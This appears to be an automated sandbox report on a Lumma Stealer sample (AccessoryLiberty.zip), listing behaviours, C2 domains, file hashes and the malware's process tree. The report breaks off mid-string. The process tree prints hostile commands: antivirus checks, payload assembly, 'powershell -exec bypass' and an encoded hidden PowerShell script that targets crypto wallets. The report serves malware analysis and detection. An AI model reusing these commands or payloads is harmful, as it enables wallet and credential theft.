Analysis Overview
SHA256
b80c11df84d7873d503f4961a305ffe8ea74ce65d411273183939d3c446cb5f8
Threat Level: Known bad
The file AccessoryLiberty.zip was found to be: Known bad.
Malicious Activity Summary
Lumma family
Lumma Stealer, LummaC
Blocklisted process makes network request
Downloads MZ/PE file
Checks computer location settings
Reads user/profile data of web browsers
Uses the VBS compiler for execution
Executes dropped EXE
Loads dropped DLL
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Suspicious use of SetThreadContext
Enumerates processes with tasklist
Drops file in Windows directory
Unsigned PE
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Browser Information Discovery
Suspicious use of WriteProcessMemory
Checks processor information in registry
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-13 19:37
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-13 19:37
Reported
2024-11-13 19:39
Platform
win7-20240903-en
Max time kernel
117s
Max time network
117s
Command Line
Signatures
Lumma Stealer, LummaC
Lumma family
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\OSXTOC.pif | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
Reads user/profile data of web browsers
Uses the VBS compiler for execution
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\dbabech = "\"C:\\ehfecbk\\AutoIt3.exe\" C:\\ehfecbk\\dbabech.a3x" | C:\Users\Admin\AppData\Roaming\OSXTOC.pif | N/A |
Checks installed software on the system
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2944 set thread context of 1864 | N/A | C:\Users\Admin\AppData\Roaming\OSXTOC.pif | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\PharmaciesLowest | C:\Users\Admin\AppData\Local\Temp\AccessoryLiberty.exe | N/A |
| File opened for modification | C:\Windows\CouncilsStatement | C:\Users\Admin\AppData\Local\Temp\AccessoryLiberty.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\AccessoryLiberty.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\OSXTOC.pif | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\choice.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Roaming\OSXTOC.pif | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Roaming\OSXTOC.pif | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\AccessoryLiberty.exe
"C:\Users\Admin\AppData\Local\Temp\AccessoryLiberty.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy Coordination Coordination.bat & Coordination.bat
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa opssvc"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 208231
C:\Windows\SysWOW64\findstr.exe
findstr /V "pantiescurverefrigeratorcapital" Portfolio
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Canada + ..\Dv + ..\Admissions + ..\Strand + ..\Boring + ..\Synthetic + ..\Evaluation O
C:\Users\Admin\AppData\Local\Temp\208231\War.pif
War.pif O
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -exec bypass -f "C:\Users\Admin\AppData\Local\Temp\8DM73Q6MILY9OMG2FF0EK1936BFOZYX.ps1"
C:\Users\Admin\AppData\Roaming\OSXTOC.pif
"C:\Users\Admin\AppData\Roaming\OSXTOC.pif" "C:\Users\Admin\AppData\Roaming\D4LFFM.pptm"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | fiuflJZlSGqtte.fiuflJZlSGqtte | udp |
| US | 8.8.8.8:53 | toleratedbaybo.cyou | udp |
| US | 172.67.140.112:443 | toleratedbaybo.cyou | tcp |
| US | 172.67.140.112:443 | toleratedbaybo.cyou | tcp |
| US | 172.67.140.112:443 | toleratedbaybo.cyou | tcp |
| US | 172.67.140.112:443 | toleratedbaybo.cyou | tcp |
| US | 172.67.140.112:443 | toleratedbaybo.cyou | tcp |
| US | 8.8.8.8:53 | cdn1.pixel-story.shop | udp |
| US | 104.21.32.85:443 | cdn1.pixel-story.shop | tcp |
| US | 8.8.8.8:53 | pixelpalette.shop | udp |
| US | 104.21.84.104:443 | pixelpalette.shop | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Coordination
| MD5 | 485f89cfaf1420f132a95a0b7c6e6305 |
| SHA1 | efb827df52282fb79b5f44ec9e63b8e5a47c37e1 |
| SHA256 | eea03a384671dd1323b8d853ed49df8a27dbc2a706400437bd8d48e6076453bd |
| SHA512 | 116c823265a05c4b338e94204ce48267f112d12e55a8473fc05426af0a476c37fc272408eb805d117f6e8cab059fbd708c6158bd041ff3e9a8a430a577cc669b |
C:\Users\Admin\AppData\Local\Temp\Portfolio
| MD5 | 4d06e14fe2951aa0024c22936e5f531b |
| SHA1 | c718b677b65d246033898069459f078a00f650be |
| SHA256 | 0e3ab81f015e71af9b43ed7fd5854c3560c6ce09443b0cbffb0ac6c10d93d918 |
| SHA512 | 5bf78bc3bfce3553dff1e80ec3fef4c2589e618b1a3ac2723ed89a24c5fdd78b5e80f2bc778346f21b2c5f9750c00ea7a5ba9b3bd42f9f9f804ef838b92c887c |
C:\Users\Admin\AppData\Local\Temp\Shoppers
| MD5 | 52620731f9486725cceaf71e1a45cc9f |
| SHA1 | 0d166e1027ae7903dced0abe3570f71516fc5baf |
| SHA256 | 73e5301ad4b4aea78e34de20b8088641fc1d04b1444ed4ecbc6da47603d87cc2 |
| SHA512 | b4546af693050332c0477dd38b5e816ac2fe490d550ae296ef759714c33c96a648e4ed96294b777392bbfaf6fba876460f78c5730ecc61ef801f45cdb298dc36 |
C:\Users\Admin\AppData\Local\Temp\Canada
| MD5 | d426ef537d4e36651d372eb67de61c71 |
| SHA1 | c00ecae6e973056c698680c714bd8c932df53c56 |
| SHA256 | f0919fbdae23b005eb403344118d8509a316037ae5460484d81d8452a74812e3 |
| SHA512 | d042b71e1badef416e42f8c1235163ed7a71ae5d3cd897aca1dbb2b344769428b37e71e7b9b1a6c0ffbfdab8222eff893fc28415389b5afdcd262bd7eb7a40d6 |
C:\Users\Admin\AppData\Local\Temp\Dv
| MD5 | 367fecb6d4d73f3e22e2186fbe91f216 |
| SHA1 | 2bce21a05dfeee536cda999fbaa73c1af28b9d86 |
| SHA256 | 11741c20239ea1dd1c392abda3ee226e16ad2fd004f8fe344d2d068c8e20ef62 |
| SHA512 | 09009011345cc71715ba9ff975d0d304d3160090281a3c9672187b2f2c3eeab3653c31849f1306ae3d77459e0de8f63ce2037c0d330c16c361491d32b089b315 |
C:\Users\Admin\AppData\Local\Temp\Admissions
| MD5 | b9675af1aafe9bbc3397bb840117840a |
| SHA1 | e0fae0f4ef594f472216025e838fadbb2aa0b861 |
| SHA256 | 875276f91f4aa27b3d23da12c88e94871fe7ed6401ec8f4657b4f6be2f33a01d |
| SHA512 | 70a24225488d1e41f36244d7811766e2379b8c90ea57d1fb5d33b54e2f62e032002a7c2e45aeb8f47e45840a6cc16cfed5680f88e71de68b3a15af73db24a5e6 |
C:\Users\Admin\AppData\Local\Temp\Evaluation
| MD5 | 9c1eec6ad97d3430478939c6df01ea8a |
| SHA1 | be6e6c3fbb3fb22e34d7b5bc2c1a2d996bb4e81e |
| SHA256 | fbc43c30a07c44894f7870d666d3e370f4d5f77695d5fa727597884c1495fc9b |
| SHA512 | 2f4923eccd70a2790b6a6e4876f91aa9fd87b7e767abac3e48084b14de21a7beccf471eca35b9df1069e67ed18407916213ff7b52b129fe252c7169b2081bad6 |
C:\Users\Admin\AppData\Local\Temp\Synthetic
| MD5 | c0391116646bfea7d85bb681a33e3ba0 |
| SHA1 | 9996422133ed60d69b923b118949183e8758e0a3 |
| SHA256 | 5791d23d4c78f0e17d98eee9e51ebf24ea678fdf9b059bfb5dcf19c16dcba85a |
| SHA512 | 3e6a4e31ad6161fa617aa116378d9817390a031e640a157cdda299e8d0dddc4e27517ff53ed56081c0c34b348be627b6a5ab6f1c1ae9192f34a446ba19b23f47 |
C:\Users\Admin\AppData\Local\Temp\Boring
| MD5 | 10e29c8822f7da216b45a11d3ee0eda8 |
| SHA1 | 23e62cb3f04cd00b22fe54a65e3b81518c78e614 |
| SHA256 | 4a4f9151f243bd1eca82a0721bae4136e37c3835324991516c62fc70f99dcb05 |
| SHA512 | c0a2772c8ae6c4b450f38327c8386f526ffff7f3bec3bf6e495a2a01b465da64de4d815e51961f37cb43239b05d3fd53a01fb4b33cd0fa67a84680bc24ffe572 |
C:\Users\Admin\AppData\Local\Temp\Strand
| MD5 | cd7bd19edb3ded5365bab0e5956309db |
| SHA1 | 1e0d4ba49a9592faebcfa4119f523ca7735108bb |
| SHA256 | 84078ab15033945d702802a013fbc3142b56db1371ff79ba1107df211300d803 |
| SHA512 | 574476aaf140810d1cfd9a99187097d68c024c89c57f82a2399e2933f46e854989364759e35474048eaad35b817c63d05e19ed75393ec893bbaf57f7061d96e4 |
\Users\Admin\AppData\Local\Temp\208231\War.pif
| MD5 | 78ba0653a340bac5ff152b21a83626cc |
| SHA1 | b12da9cb5d024555405040e65ad89d16ae749502 |
| SHA256 | 05d8cf394190f3a707abfb25fb44d7da9d5f533d7d2063b23c00cc11253c8be7 |
| SHA512 | efb75e4c1e0057ffb47613fd5aae8ce3912b1558a4b74dbf5284c942eac78ecd9aca98f7c1e0e96ec38e8177e58ffdf54f2eb0385e73eef39e8a2ce611237317 |
C:\Users\Admin\AppData\Local\Temp\208231\O
| MD5 | 36464052c5bab6fbe9375ae0c39f051a |
| SHA1 | cd35ee319164eb8a73bc8b5f86fea33b7227ae64 |
| SHA256 | d0b9c83c8bddbe2d9e18b0e8c5e3abcdb3bac5a9f6f3058fc3bcb8d3fde78ced |
| SHA512 | 01a7c98f1fa174dfc72360372b01e641a432e5b429ac3a366a9648f42e1776e9cfd5f9834173a8483fc470b1ec7fcadde7a7f639e07f08dadf460f5b46e9cb59 |
memory/2640-556-0x0000000003890000-0x00000000038E7000-memory.dmp
memory/2640-558-0x0000000003890000-0x00000000038E7000-memory.dmp
memory/2640-560-0x0000000003890000-0x00000000038E7000-memory.dmp
memory/2640-559-0x0000000003890000-0x00000000038E7000-memory.dmp
memory/2640-557-0x0000000003890000-0x00000000038E7000-memory.dmp
memory/2640-555-0x0000000003890000-0x00000000038E7000-memory.dmp
memory/2640-568-0x0000000002580000-0x00000000025B9000-memory.dmp
memory/2640-569-0x0000000002580000-0x00000000025B9000-memory.dmp
memory/2640-567-0x0000000003890000-0x00000000038E7000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\8DM73Q6MILY9OMG2FF0EK1936BFOZYX.ps1
| MD5 | a93ef812fcdf3af24ff8b33a75d4992e |
| SHA1 | b282892bd321a8709474f43d790d7e661edaa98f |
| SHA256 | d5a89ca10e0e354df724efa955616b27501534cd5153f3c387c9d569a73cdbc6 |
| SHA512 | 272da3e9cb498541454f381d360e4dd47498ecf1f604844dcaea21316a3f37547688f52439d38bb6208f513ba8fc9e442b82cbb622c6579323530c342853b037 |
\Users\Admin\AppData\Roaming\OSXTOC.pif
| MD5 | 3f58a517f1f4796225137e7659ad2adb |
| SHA1 | e264ba0e9987b0ad0812e5dd4dd3075531cfe269 |
| SHA256 | 1da298cab4d537b0b7b5dabf09bff6a212b9e45731e0cc772f99026005fb9e48 |
| SHA512 | acf740aafce390d06c6a76c84e7ae7c0f721731973aadbe3e57f2eb63241a01303cc6bf11a3f9a88f8be0237998b5772bdaf569137d63ba3d0f877e7d27fc634 |
C:\Users\Admin\AppData\Roaming\D4LFFM.pptm
| MD5 | 3c6d0866e54ab391bc09713fde4c9d38 |
| SHA1 | a1a4e9c067e3c85739e85fb45f7ecdb363bcf856 |
| SHA256 | ffe15bff44969541749b01e1ab80492c95990bf4af35fb62e0d93bf6a4b81682 |
| SHA512 | eebf8ca2e3d778ca9706276b26c4d3daedf9cb7067d695cbf9e07755e6887e782d25a8aa6785034052b39105518c69f7e09b12c8199e58d13fcaf6b7f82b58b4 |
memory/1864-586-0x0000000000400000-0x00000000009BA000-memory.dmp
memory/1864-587-0x0000000000400000-0x00000000009BA000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-13 19:37
Reported
2024-11-13 19:39
Platform
win10v2004-20241007-en
Max time kernel
92s
Max time network
138s
Command Line
Signatures
Lumma Stealer, LummaC
Lumma family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\AccessoryLiberty.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\0VYTBW.pif | N/A |
Reads user/profile data of web browsers
Uses the VBS compiler for execution
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\dbabech = "\"C:\\ehfecbk\\AutoIt3.exe\" C:\\ehfecbk\\dbabech.a3x" | C:\Users\Admin\AppData\Roaming\0VYTBW.pif | N/A |
Checks installed software on the system
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\CouncilsStatement | C:\Users\Admin\AppData\Local\Temp\AccessoryLiberty.exe | N/A |
| File opened for modification | C:\Windows\PharmaciesLowest | C:\Users\Admin\AppData\Local\Temp\AccessoryLiberty.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\AccessoryLiberty.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\choice.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\0VYTBW.pif | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Roaming\0VYTBW.pif | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Roaming\0VYTBW.pif | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\208231\War.pif | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\AccessoryLiberty.exe
"C:\Users\Admin\AppData\Local\Temp\AccessoryLiberty.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy Coordination Coordination.bat & Coordination.bat
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa opssvc"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 208231
C:\Windows\SysWOW64\findstr.exe
findstr /V "pantiescurverefrigeratorcapital" Portfolio
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Canada + ..\Dv + ..\Admissions + ..\Strand + ..\Boring + ..\Synthetic + ..\Evaluation O
C:\Users\Admin\AppData\Local\Temp\208231\War.pif
War.pif O
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -exec bypass -f "C:\Users\Admin\AppData\Local\Temp\K1HDCVMZ3CHA6WL98LCQ54O6LSAEU.ps1"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOPrOF -Ep BYPAss -W hI -eNc JABlAGQASABIAGYAPQAnAGgASwBjAFUAOgBcAHMAbwBmAHQAVwBhAFIAZQBcAGMAbABhAFMAcwBlAHMAXAAnADsAIAAkAHcAQQBhAGoAPQAkAGUAbgBWADoATABPAGMAQQBsAGEAUABwAEQAQQB0AGEAKwAnAFwAcABSAE8AZwByAEEATQBTAFwAJwA7ACAAJAA5AHYAeABuADUAPQAoAEcARQBUAC0AVwBtAEkAbwBCAGoARQBjAFQAIAAtAEMATABhAHMAUwAgAFcAaQBOADMAMgBfAEMAbwBtAHAAVQB0AGUAcgBTAFkAcwB0AEUAbQApAC4AcABBAFIAVABPAGYAZABPAE0AQQBJAE4AOwAgACQAVgB2AHAAUwA9ADAAOwAgACQAVgA0AHQAbwBuAD0AJwBjADoAXABQAHIAbwBHAHIAQQBNACAARgBpAEwAZQBzAFwAJwA7ACAAJAByADUAUwB1AGkAPQAnAEgASwBMAE0AOgBcAFMATwBmAHQAdwBhAFIARQBcAGMATABBAHMAUwBFAFMAXAAnADsAIAAkAEUAawBRAGQAPQAnAGgAawBDAFUAOgBcAHMATwBmAHQAVwBBAHIARQBcACcAOwAgACQAWQBNAGMAegA9AEAAKAAgACQAdgA0AHQATwBOACsAJwBiAEkAVABiAE8AeABcAGIASQB0AGIAbwB4AC4ARQBYAEUAJwA7ACAAJABXAEEAYQBqACsAJwBDAFkAcABoAEUAcgBvAEMASwAgAEMAWQBTAHkATgBDAFwAQwB5AHAASABlAFIATwBDAEsAIABDAFkAcwB5AG4AQwAuAEUAWABlACcAOwAgACQARQBkAEgAaABmACsAJwBrAEUAZQBwAGsAZQBZACcAOwAgACQAVwBBAGEASgArACcAawBFAEUAdgBPAC0AVwBhAEwAbABlAFQAXABLAEUARQB2AE8AIABsAGkAbgBLAC4AZQBYAGUAJwA7ACAAJABWADQAVABvAE4AKwAnAGwAZQBEAGcAZQByACAAbABJAFYAZQBcAEwAZQBkAGcAZQBSACAAbABJAHYAZQAuAEUAeABlACcAOwAgACQAZQBrAFEAZAArACcAYgBJAFQAQgBvAFgAYQBwAFAAJwA7ACAAJAB3AEEAQQBqACsAJwBUAFIARQBaAE8AUgAgAFMAVQBpAFQAZQBcAFQAUgBFAHoAbwByACAAUwBVAEkAVABFAC4AZQBYAEUAJwA7ACAAJAB3AGEAYQBqACsAJwBSAGEAYgBCAHkALQBkAEUAUwBLAHQATwBwAFwAcgBBAGIAQgB5ACAARABlAHMASwBUAG8AcAAuAEUAWABFACcAOwAgACQARQBLAHEAZAArACcAbQBJAGMAUgBvAFMAbwBmAFQAXABXAGkATgBEAE8AdwBTAFwAYwB1AFIAUgBlAE4AdABWAEUAcgBzAGkATwBuAFwAdQBOAGkAbgBzAHQAQQBMAEwAXABCAGkAdABiAG8AWABBAFAAUAAnADsAIAAkAFIANQBzAFUASQArACcAbABFAGQAZwBlAFIAbABpAFYARQAnADsAIAAkAEUARABoAEgAZgArACcAYQBvAHAAcAAnADsAIAAkAEUARABoAEgARgArACcAVABSAGUAWgBPAHIAcwBVAEkAdABFACcAOwAgACQAdgA0AFQAbwBOACsAJwBiAEMAIABWAEEAVQBMAHQAXABCAGMAVgBhAFUATABUAC4ARQBYAGUAJwA7ACAAJAByADUAUwB1AEkAKwAnAEIAQwB2AGEAdQBsAHQAJwA7ACAAJABXAGEAYQBqACsAJwBLAGUAZQBwAEsAZQBZAC0ARABFAFMAawB0AE8AUABcAEsARQBFAHAAawBFAHkAIABEAGUAcwBrAFQAbwBQAC4AZQB4AEUAJwA7ACAAJABFAEsAcQBEACsAJwByAEUAQQBMACAAcwBlAGMAdQByAGkAdABZAFwAYgBDAHYAYQB1AEwAdAAnADsAIAAkAEUAZABoAGgARgArACcASwBlAEUAVgBPACcAOwAgACQARQBEAEgAaABGACsAJwBMAGkAUQBVAGkAZABuAGUAdABXAG8AcgBrACcAOwAgACQARQBkAEgASABGACsAJwBDAFkAUABoAEUAcgBPAEMASwAnADsAIAAkAGUARABIAEgARgArACcAbwBuAEUAawBFAFkAL